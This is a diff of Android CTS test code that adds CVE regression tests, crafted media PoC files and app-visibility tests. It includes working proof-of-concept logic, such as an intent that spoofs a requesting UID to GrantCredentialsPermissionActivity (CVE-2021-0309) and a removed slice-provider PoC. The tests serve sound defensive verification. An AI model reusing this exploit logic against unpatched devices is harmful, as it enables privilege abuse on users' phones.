@@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.tradefed.device.ITestDevice; + +import static org.junit.Assume.*; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0384 extends SecurityTestCase { + + /** + * b/150159906 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-09") + @Test + public void testPocCVE_2020_0384() throws Exception { + assumeFalse(moduleIsPlayManaged("com.google.android.media")); + String inputFiles[] = {"cve_2020_0384.xmf", "cve_2020_0384.info"}; + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0384", + AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1], + inputFiles, AdbUtils.TMP_PATH, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java new file mode 100644 index 00000000000..e7aefeb9638 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java @@ -0,0 +1,43 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.tradefed.device.ITestDevice; + +import static org.junit.Assume.*; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0385 extends SecurityTestCase { + + /** + * b/150160041 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-09") + @Test + public void testPocCVE_2020_0385() throws Exception { + assumeFalse(moduleIsPlayManaged("com.google.android.media")); + String inputFiles[] = {"cve_2020_0385.xmf", "cve_2020_0385.info"}; + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0385", + AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1], + inputFiles, AdbUtils.TMP_PATH, getDevice()); + } +} diff --git a/libs/install/Android.bp b/libs/install/Android.bp index 6babab7fcbe..8d0f799d110 100644 --- a/libs/install/Android.bp +++ b/libs/install/Android.bp @@ -91,7 +91,7 @@ android_test_helper_app { } java_library { - name: "cts-install-lib", + name: "cts-install-lib-java", srcs: ["src/**/lib/*.java"], static_libs: ["androidx.test.rules", "compatibility-device-util-axt", "truth-prebuilt"], sdk_version: "test_current", @@ -111,6 +111,14 @@ java_library { ], } +android_library { + name: "cts-install-lib", + manifest: "AndroidManifest.xml", + static_libs: [ + "cts-install-lib-java", + ], +} + java_library_host { name: "cts-install-lib-host", srcs: ["src/**/host/InstallUtilsHost.java"], diff --git a/libs/install/AndroidManifest.xml b/libs/install/AndroidManifest.xml new file mode 100644 index 00000000000..e9f5b7d1278 --- /dev/null +++ b/libs/install/AndroidManifest.xml @@ -0,0 +1,29 @@ +<?xml version="1.0" encoding="utf-8"?> +<!-- Copyright (C) 2020 The Android Open Source Project + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. +--> + +<manifest xmlns:android="http://schemas.android.com/apk/res/android" + package="com.android.cts.install.lib" + android:versionCode="1" + android:versionName="1.0"> + + <queries> + <package android:name="com.android.cts.install.lib.testapp.A"/> + <package android:name="com.android.cts.install.lib.testapp.B"/> + <package android:name="com.android.cts.install.lib.testapp.C"/> + </queries> + + <uses-sdk android:minSdkVersion="8"/> +</manifest> diff --git a/libs/install/testapp/ACrashingV2.xml b/libs/install/testapp/ACrashingV2.xml index 0ec90cfe66c..338a5b95647 100644 --- a/libs/install/testapp/ACrashingV2.xml +++ b/libs/install/testapp/ACrashingV2.xml @@ -22,7 +22,7 @@ <uses-sdk android:minSdkVersion="19" /> - <application android:label="Test App A v2" android:forceQueryable="true"> + <application android:label="Test App A v2"> <receiver android:name="com.android.cts.install.lib.testapp.ProcessUserData" android:exported="true" /> <activity android:name="com.android.cts.install.lib.testapp.CrashingMainActivity"> diff --git a/libs/install/testapp/Av1.xml b/libs/install/testapp/Av1.xml index 5b476994cea..e9714fc4ca6 100644 --- a/libs/install/testapp/Av1.xml +++ b/libs/install/testapp/Av1.xml @@ -22,7 +22,7 @@ <uses-sdk android:minSdkVersion="19" /> - <application android:label="Test App A1" android:forceQueryable="true"> + <application android:label="Test App A1"> <receiver android:name="com.android.cts.install.lib.testapp.ProcessUserData" android:exported="true" /> <activity android:name="com.android.cts.install.lib.testapp.MainActivity"> diff --git a/libs/install/testapp/Av2.xml b/libs/install/testapp/Av2.xml index 9f2c21a0e82..fd8afa0e7e7 100644 --- a/libs/install/testapp/Av2.xml +++ b/libs/install/testapp/Av2.xml @@ -22,7 +22,7 @@ <uses-sdk android:minSdkVersion="19" /> - <application android:label="Test App A2" android:forceQueryable="true"> + <application android:label="Test App A2"> <receiver android:name="com.android.cts.install.lib.testapp.ProcessUserData" android:exported="true" /> <activity android:name="com.android.cts.install.lib.testapp.MainActivity"> diff --git a/libs/install/testapp/Av3.xml b/libs/install/testapp/Av3.xml index d86aebdd2c9..a7839e31765 100644 --- a/libs/install/testapp/Av3.xml +++ b/libs/install/testapp/Av3.xml @@ -22,7 +22,7 @@ <uses-sdk android:minSdkVersion="19" /> - <application android:label="Test App A3" android:forceQueryable="true"> + <application android:label="Test App A3"> <receiver android:name="com.android.cts.install.lib.testapp.ProcessUserData" android:exported="true" /> <activity android:name="com.android.cts.install.lib.testapp.MainActivity"> diff --git a/libs/install/testapp/Bv1.xml b/libs/install/testapp/Bv1.xml index f990713975f..403e7e20fe8 100644 --- a/libs/install/testapp/Bv1.xml +++ b/libs/install/testapp/Bv1.xml @@ -22,7 +22,7 @@ <uses-sdk android:minSdkVersion="19" /> - <application android:label="Test App B1" android:forceQueryable="true"> + <application android:label="Test App B1"> <receiver android:name="com.android.cts.install.lib.testapp.ProcessUserData" android:exported="true" /> <activity android:name="com.android.cts.install.lib.testapp.MainActivity"> diff --git a/libs/install/testapp/Bv2.xml b/libs/install/testapp/Bv2.xml index 3bd729258b7..f030c3f3186 100644 --- a/libs/install/testapp/Bv2.xml +++ b/libs/install/testapp/Bv2.xml @@ -22,7 +22,7 @@ <uses-sdk android:minSdkVersion="19" /> - <application android:label="Test App B2" android:forceQueryable="true"> + <application android:label="Test App B2"> <receiver android:name="com.android.cts.install.lib.testapp.ProcessUserData" android:exported="true" /> <activity android:name="com.android.cts.install.lib.testapp.MainActivity"> diff --git a/libs/install/testapp/Cv1.xml b/libs/install/testapp/Cv1.xml index 32f69896faa..edb69f92494 100644 --- a/libs/install/testapp/Cv1.xml +++ b/libs/install/testapp/Cv1.xml @@ -23,7 +23,7 @@ <uses-sdk android:minSdkVersion="19" /> - <application android:label="Test App C1" android:forceQueryable="true"> + <application android:label="Test App C1"> <receiver android:name="com.android.cts.install.lib.testapp.ProcessUserData" android:exported="true" /> <activity android:name="com.android.cts.install.lib.testapp.MainActivity"> diff --git a/tests/tests/appenumeration/AndroidTest.xml b/tests/tests/appenumeration/AndroidTest.xml index 6503bdbeba9..26f6b90b9ca 100644 --- a/tests/tests/appenumeration/AndroidTest.xml +++ b/tests/tests/appenumeration/AndroidTest.xml @@ -26,7 +26,7 @@ <option name="force-queryable" value="false" /> <option name="cleanup-apks" value="true" /> <option name="test-file-name" value="CtsAppEnumerationTestCases.apk" /> - <option name="test-file-name" value="CtsAppEnumerationForceQueryable.apk" /> + <option name="test-file-name" value="CtsAppEnumerationForceQueryableNormalInstall.apk" /> <option name="test-file-name" value="CtsAppEnumerationFilters.apk" /> <option name="test-file-name" value="CtsAppEnumerationNoApi.apk" /> <option name="test-file-name" value="CtsAppEnumerationContactsActivityTarget.apk" /> @@ -61,6 +61,12 @@ <option name="test-file-name" value="CtsAppEnumerationWildcardBrowserActivitySource.apk" /> </target_preparer> + <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller"> + <option name="force-queryable" value="true" /> + <option name="cleanup-apks" value="true" /> + <option name="test-file-name" value="CtsAppEnumerationForceQueryable.apk" /> + </target_preparer> + <!-- Create place to store apks --> <target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer"> <option name="run-command" value="mkdir -p /data/local/tmp/cts/appenumeration" /> diff --git a/tests/tests/appenumeration/app/target/Android.bp b/tests/tests/appenumeration/app/target/Android.bp index 04ebc788f5e..b3afe4b98cc 100644 --- a/tests/tests/appenumeration/app/target/Android.bp +++ b/tests/tests/appenumeration/app/target/Android.bp @@ -27,6 +27,20 @@ android_test_helper_app { } android_test_helper_app { + name: "CtsAppEnumerationForceQueryableNormalInstall", + manifest: "AndroidManifest-forceQueryable-normalInstall.xml", + defaults: ["cts_support_defaults"], + srcs: ["src/**/*.java"], + // Tag this module as a cts test artifact + test_suites: [ + "cts", + "vts10", + "general-tests", + ], + sdk_version: "test_current", +} + +android_test_helper_app { name: "CtsAppEnumerationFilters", manifest: "AndroidManifest-filters.xml", defaults: ["cts_support_defaults"], diff --git a/tests/tests/appenumeration/app/target/AndroidManifest-forceQueryable-normalInstall.xml b/tests/tests/appenumeration/app/target/AndroidManifest-forceQueryable-normalInstall.xml new file mode 100644 index 00000000000..2918e37d44a --- /dev/null +++ b/tests/tests/appenumeration/app/target/AndroidManifest-forceQueryable-normalInstall.xml @@ -0,0 +1,25 @@ +<?xml version="1.0" encoding="utf-8"?> +<!-- + Copyright (C) 2019 The Android Open Source Project + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. + --> + +<manifest xmlns:android="http://schemas.android.com/apk/res/android" + package="android.appenumeration.forcequeryable.normalinstall"> + <application android:forceQueryable="true"> + <!-- This app will not be a system app and should be installed as a normal app (not + forceQueryable) to ensure it's not visible by default --> + <uses-library android:name="android.test.runner" /> + </application> +</manifest> diff --git a/tests/tests/appenumeration/app/target/AndroidManifest-forceQueryable.xml b/tests/tests/appenumeration/app/target/AndroidManifest-forceQueryable.xml index e6535b3c3ae..041d350519f 100644 --- a/tests/tests/appenumeration/app/target/AndroidManifest-forceQueryable.xml +++ b/tests/tests/appenumeration/app/target/AndroidManifest-forceQueryable.xml @@ -18,6 +18,8 @@ <manifest xmlns:android="http://schemas.android.com/apk/res/android" package="android.appenumeration.forcequeryable"> <application android:forceQueryable="true"> + <!-- This app will not be a system app and so must be installed as forceQueryable by the + test framework --> <uses-library android:name="android.test.runner" /> </application> </manifest> diff --git a/tests/tests/appenumeration/lib/src/android/appenumeration/cts/Constants.java b/tests/tests/appenumeration/lib/src/android/appenumeration/cts/Constants.java index 6fcba549e31..d7c8dae2fb7 100644 --- a/tests/tests/appenumeration/lib/src/android/appenumeration/cts/Constants.java +++ b/tests/tests/appenumeration/lib/src/android/appenumeration/cts/Constants.java @@ -78,8 +78,13 @@ public class Constants { public static final String TARGET_SHARED_USER = PKG_BASE + "noapi.shareduid"; /** A package that exposes itself via various intent filters (activities, services, etc.) */ public static final String TARGET_FILTERS = PKG_BASE + "filters"; - /** A package that declares itself force queryable, making it visible to all other packages */ + /** A package that declares itself force queryable, making it visible to all other packages. + * This is installed as forceQueryable as non-system apps cannot declare themselves as such. */ public static final String TARGET_FORCEQUERYABLE = PKG_BASE + "forcequeryable"; + /** A package that declares itself force queryable, but is installed normally making it not + * visible to other packages */ + public static final String TARGET_FORCEQUERYABLE_NORMAL = + PKG_BASE + "forcequeryable.normalinstall"; /** A package with no published API and so isn't queryable by anything but package name */ public static final String TARGET_NO_API = PKG_BASE + "noapi"; /** A package that offers an activity used for opening / editing file types */ diff --git a/tests/tests/appenumeration/src/android/appenumeration/cts/AppEnumerationTests.java b/tests/tests/appenumeration/src/android/appenumeration/cts/AppEnumerationTests.java index d95970b864d..cfd12a2f672 100644 --- a/tests/tests/appenumeration/src/android/appenumeration/cts/AppEnumerationTests.java +++ b/tests/tests/appenumeration/src/android/appenumeration/cts/AppEnumerationTests.java @@ -66,6 +66,7 @@ import static android.appenumeration.cts.Constants.TARGET_EDITOR; import static android.appenumeration.cts.Constants.TARGET_FILTERS; import static android.appenumeration.cts.Constants.TARGET_FILTERS_APK; import static android.appenumeration.cts.Constants.TARGET_FORCEQUERYABLE; +import static android.appenumeration.cts.Constants.TARGET_FORCEQUERYABLE_NORMAL; import static android.appenumeration.cts.Constants.TARGET_NO_API; import static android.appenumeration.cts.Constants.TARGET_SHARE; import static android.appenumeration.cts.Constants.TARGET_SHARED_USER; @@ -177,6 +178,15 @@ public class AppEnumerationTests { } @Test + public void all_cannotSeeForceQueryableInstalledNormally() throws Exception { + assertNotVisible(QUERIES_NOTHING, TARGET_FORCEQUERYABLE_NORMAL); + assertNotVisible(QUERIES_ACTIVITY_ACTION, TARGET_FORCEQUERYABLE_NORMAL); + assertNotVisible(QUERIES_SERVICE_ACTION, TARGET_FORCEQUERYABLE_NORMAL); + assertNotVisible(QUERIES_PROVIDER_AUTH, TARGET_FORCEQUERYABLE_NORMAL); + assertNotVisible(QUERIES_PACKAGE, TARGET_FORCEQUERYABLE_NORMAL); + } + + @Test public void startExplicitly_canStartNonVisible() throws Exception { assertNotVisible(QUERIES_NOTHING, TARGET_FILTERS); startExplicitIntentViaComponent(QUERIES_NOTHING, TARGET_FILTERS); diff --git a/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java b/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java index 5584fabf91f..16d595fb584 100644 --- a/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java +++ b/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java @@ -27,6 +27,7 @@ import android.content.res.Configuration; import android.database.Cursor; import android.net.Uri; import android.os.SystemClock; +import android.platform.test.annotations.SecurityTest; import android.provider.Settings; import android.provider.Settings.SettingNotFoundException; import android.provider.Settings.System; @@ -139,6 +140,10 @@ public class Settings_SystemTest { } } + /** + * Verifies that the invalid values for the font scale setting are rejected. + */ + @SecurityTest(minPatchLevel = "2021-02") @Test public void testSystemSettingsRejectInvalidFontSizeScale() throws SettingNotFoundException { final ContentResolver cr = InstrumentationRegistry.getTargetContext().getContentResolver(); diff --git a/tests/tests/security/Android.bp b/tests/tests/security/Android.bp index 41d9fad8879..e82f2e1a677 100644 --- a/tests/tests/security/Android.bp +++ b/tests/tests/security/Android.bp @@ -27,6 +27,7 @@ android_test { "compatibility-common-util-devicesidelib", "guava", "platform-test-annotations", + "hamcrest-library", ], libs: [ "android.test.runner.stubs", @@ -75,4 +76,4 @@ android_test_helper_app { android_app_certificate { name: "security_cts_test_certificate", certificate: "security_cts_test_cert", -}
\ No newline at end of file +} diff --git a/tests/tests/security/res/anim/translate1.xml b/tests/tests/security/res/anim/translate1.xml index e8c562e1399..da2ee564649 100644 --- a/tests/tests/security/res/anim/translate1.xml +++ b/tests/tests/security/res/anim/translate1.xml @@ -4,4 +4,4 @@ android:fromYDelta="0%" android:toYDelta="-100%" android:interpolator="@android:anim/linear_interpolator" - android:duration="6000" /> + android:duration="10000" /> diff --git a/tests/tests/security/res/anim/translate2.xml b/tests/tests/security/res/anim/translate2.xml index 7156c5689d5..d4bc6d90fbe 100644 --- a/tests/tests/security/res/anim/translate2.xml +++ b/tests/tests/security/res/anim/translate2.xml @@ -4,4 +4,4 @@ android:fromYDelta="100%" android:toYDelta="0%" android:interpolator="@android:anim/linear_interpolator" - android:duration="6000" /> + android:duration="10000" /> diff --git a/tests/tests/security/res/raw/cve_2020_11122.mkv b/tests/tests/security/res/raw/cve_2020_11122.mkv Binary files differnew file mode 100644 index 00000000000..f0fa08f22af --- /dev/null +++ b/tests/tests/security/res/raw/cve_2020_11122.mkv diff --git a/tests/tests/security/res/raw/cve_2020_11139.flac b/tests/tests/security/res/raw/cve_2020_11139.flac Binary files differnew file mode 100644 index 00000000000..3700ba9ab23 --- /dev/null +++ b/tests/tests/security/res/raw/cve_2020_11139.flac diff --git a/tests/tests/security/res/raw/cve_2020_11168.mkv b/tests/tests/security/res/raw/cve_2020_11168.mkv Binary files differnew file mode 100644 index 00000000000..58bf85e42d2 --- /dev/null +++ b/tests/tests/security/res/raw/cve_2020_11168.mkv diff --git a/tests/tests/security/res/raw/cve_2020_3663.mp4 b/tests/tests/security/res/raw/cve_2020_3663.mp4 Binary files differnew file mode 100644 index 00000000000..54af26cad62 --- /dev/null +++ b/tests/tests/security/res/raw/cve_2020_3663.mp4 diff --git a/tests/tests/security/res/raw/cve_2020_3688.mp4 b/tests/tests/security/res/raw/cve_2020_3688.mp4 Binary files differnew file mode 100644 index 00000000000..18ec0ad8be4 --- /dev/null +++ b/tests/tests/security/res/raw/cve_2020_3688.mp4 diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0309.java b/tests/tests/security/src/android/security/cts/CVE_2021_0309.java new file mode 100644 index 00000000000..3f39a0ef85f --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0309.java @@ -0,0 +1,94 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package android.security.cts; + +import static org.junit.Assert.assertFalse; + +import android.accounts.Account; +import android.accounts.AccountAuthenticatorResponse; +import android.accounts.AccountManager; +import android.accounts.GrantCredentialsPermissionActivity; +import android.accounts.IAccountAuthenticatorResponse; +import android.content.Context; +import android.content.Intent; +import android.os.Bundle; +import android.os.RemoteException; +import android.platform.test.annotations.SecurityTest; + +import androidx.test.InstrumentationRegistry; +import androidx.test.runner.AndroidJUnit4; + +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(AndroidJUnit4.class) +public class CVE_2021_0309 { + private final Context mContext = InstrumentationRegistry.getContext(); + boolean isVulnerable = true; + + /** + * b/159145361 + */ + @SecurityTest(minPatchLevel = "2021-01") + @Test + public void testPocCVE_2021_0309() { + /** + * Output of adb shell pm list packages --user 0 -U com.android.providers.media + * package:com.android.providers.media uid:10008 + */ + final int REQUESTED_UID = 10008; + Intent intent = new Intent(); + intent.setClassName("android", + "android.accounts.GrantCredentialsPermissionActivity"); + intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); + intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_ACCOUNT, + new Account("abc@xyz.org", "com.my.auth")); + intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_AUTH_TOKEN_TYPE, + AccountManager.ACCOUNT_ACCESS_TOKEN_TYPE); + intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_RESPONSE, + new AccountAuthenticatorResponse(new IAccountAuthenticatorResponse.Stub() { + @Override + public void onResult(Bundle value) throws RemoteException { + } + + @Override + public void onRequestContinued() { + } + + @Override + public void onError(int errorCode, String errorMessage) throws RemoteException { + /** + * GrantCredentialsPermissionActivity's onCreate() should not execute and + * should return error when the requested UID does not match the process's UID + */ + isVulnerable = false; + } + })); + + intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_REQUESTING_UID, + REQUESTED_UID); + mContext.startActivity(intent); + /** + * Sleep for 5 seconds to ensure that the AccountAuthenticatorResponse callback gets + * triggered if vulnerability is fixed. + */ + try { + Thread.sleep(5000); + } catch (Exception e) { + } + assertFalse(isVulnerable); + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0322.java b/tests/tests/security/src/android/security/cts/CVE_2021_0322.java deleted file mode 100644 index 2233005ed47..00000000000 --- a/tests/tests/security/src/android/security/cts/CVE_2021_0322.java +++ /dev/null @@ -1,80 +0,0 @@ -/* - * Copyright (C) 2020 The Android Open Source Project - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package android.security.cts; - -import static org.junit.Assert.assertTrue; - -import android.app.PendingIntent; -import android.content.Context; -import android.content.Intent; -import android.content.pm.ProviderInfo; -import android.net.Uri; -import android.os.Bundle; - -import androidx.test.InstrumentationRegistry; -import androidx.test.runner.AndroidJUnit4; - -import org.junit.Test; -import org.junit.runner.RunWith; - -import android.platform.test.annotations.SecurityTest; - -@RunWith(AndroidJUnit4.class) -public class CVE_2021_0322 { - - private static final Uri BASE_URI = Uri.parse("content://android.security.cts.local/main"); - private final Context mContext = InstrumentationRegistry.getContext(); - - boolean isVulnerable = false; - boolean onFinishedExecuted = false; - - /** - * b/159145361 - */ - @SecurityTest(minPatchLevel = "2021-01") - @Test - public void testPocCVE_2021_0322() { - CVE_2021_0322_SliceProvider serviceProvider = new CVE_2021_0322_SliceProvider(); - serviceProvider.attachInfo(mContext, new ProviderInfo()); - PendingIntent pi = serviceProvider.onCreatePermissionRequest(BASE_URI); - PendingIntent.OnFinished onFinish = new PendingIntent.OnFinished() { - public void onSendFinished(PendingIntent pi, Intent intent, - int resultCode, String resultData, Bundle resultExtras) { - String packageName = intent.getStringExtra("provider_pkg"); - if(packageName != null) { - isVulnerable = true; - } - onFinishedExecuted = true; - } - }; - /* Execute the intent - the result is not required as the focus is */ - /* the intent which was used. Hence ignore the exceptions. */ - try { - pi.send(0, onFinish, null); - } catch (Exception e) { - } - /* Wait till the intent finishes. PendingIntent.OnFinished would be */ - /* exectuted and the details of the intent which was executed would */ - /* checked. */ - try { - while(!onFinishedExecuted) { - Thread.sleep(1000); //Sleep for 1 second - } - assertTrue(!isVulnerable); - } catch (Exception e) { - } - } -} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0339.java b/tests/tests/security/src/android/security/cts/CVE_2021_0339.java index 66eadadaea7..5ace5df5f08 100644 --- a/tests/tests/security/src/android/security/cts/CVE_2021_0339.java +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0339.java @@ -16,7 +16,9 @@ package android.security.cts; -import static org.junit.Assert.assertTrue; +import static org.junit.Assert.assertThat; +import static org.hamcrest.Matchers.lessThan; + import android.test.AndroidTestCase; import android.app.Activity; import android.content.Context; @@ -35,8 +37,8 @@ public class CVE_2021_0339 { static final String TAG = CVE_2021_0339.class.getSimpleName(); private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts"; - static final int MAX_TRANSITION_DURATION_MS = 3000; - static final int TIME_MEASUREMENT_DELAY_MS = 150; + static final int MAX_TRANSITION_DURATION_MS = 3000; // internal max + static final int TIME_MEASUREMENT_DELAY_MS = 5000; // tolerance for lag. public static boolean testCompleted; public FirstActivity fActivity; @@ -69,11 +71,12 @@ public class CVE_2021_0339 { Log.d(TAG, "test completed"); //A duration of a transition from "FirstActivity" to "Second Activity" - //is set in this test to 6000 ms + //is set in this test to 10 seconds // (res/anim/translate1.xml and res/anim/translate2.xml) - //The fix is supposed to limit the duration to 3000 ms - assertTrue(SecondActivity.duration < MAX_TRANSITION_DURATION_MS + - TIME_MEASUREMENT_DELAY_MS); + //The fix is supposed to limit the duration to 3000 ms. + // testing for > 8s + assertThat(SecondActivity.duration, + lessThan(MAX_TRANSITION_DURATION_MS + TIME_MEASUREMENT_DELAY_MS)); } public static class FirstActivity extends Activity { diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java index 69eb5f3b26d..949d4ced1fc 100644 --- a/tests/tests/security/src/android/security/cts/StagefrightTest.java +++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java @@ -1259,6 +1259,36 @@ public class StagefrightTest { ***********************************************************/ @Test + @SecurityTest(minPatchLevel = "2020-12") + public void testStagefright_cve_2020_11139() throws Exception { + doStagefrightTest(R.raw.cve_2020_11139); + } + + @Test + @SecurityTest(minPatchLevel = "2020-06") + public void testStagefright_cve_2020_3663() throws Exception { + doStagefrightTest(R.raw.cve_2020_3663); + } + + @Test + @SecurityTest(minPatchLevel = "2020-08") + public void testStagefright_cve_2020_11122() throws Exception { + doStagefrightTest(R.raw.cve_2020_11122); + } + + @Test + @SecurityTest(minPatchLevel = "2020-07") + public void testStagefright_cve_2020_3688() throws Exception { + doStagefrightTest(R.raw.cve_2020_3688); + } + + @Test + @SecurityTest(minPatchLevel = "2020-11") + public void testStagefright_cve_2020_11168() throws Exception { + doStagefrightTest(R.raw.cve_2020_11168); + } + + @Test @SecurityTest(minPatchLevel = "2020-06") public void testStagefright_cve_2020_3658() throws Exception { doStagefrightTest(R.raw.cve_2020_3658); |